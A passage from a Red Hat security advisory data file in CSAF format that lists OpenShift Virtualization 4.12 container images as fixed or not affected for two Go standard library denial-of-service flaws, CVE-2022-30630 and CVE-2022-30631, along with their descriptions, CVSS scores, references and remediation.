"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2107371", }, ], notes: [ { category: "description", text: "A flaw was found in the golang standard library, io/fs. Calling Glob on a path that contains a large number of path separators can cause a panic issue due to stack exhaustion. This could allow an attacker to impact availability.", title: "Vulnerability description", }, { category: "summary", text: "golang: io/fs: stack exhaustion in Glob", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-30630", }, { category: "external", summary: "RHBZ#2107371", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-30630", url: "https://www.cve.org/CVERecord?id=CVE-2022-30630", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-30630", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-30630", }, { category: "external", summary: "https://go.dev/issue/53415", url: "https://go.dev/issue/53415", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", url: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", }, ], release_date: "2022-07-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: io/fs: stack exhaustion in Glob", }, { cve: "CVE-2022-30631", cwe: { id: "CWE-1325", name: "Improperly Controlled Sequential Memory Allocation", }, discovery_date: "2022-07-14T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2107342", }, ], notes: [ { category: "description", text: "A flaw was found in golang. Calling the Reader, Read method on an archive that contains a large number of concatenated 0-length compressed files can cause a panic issue due to stack exhaustion.", title: "Vulnerability description", }, { category: "summary", text: "golang: compress/gzip: stack exhaustion in Reader.Read", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", 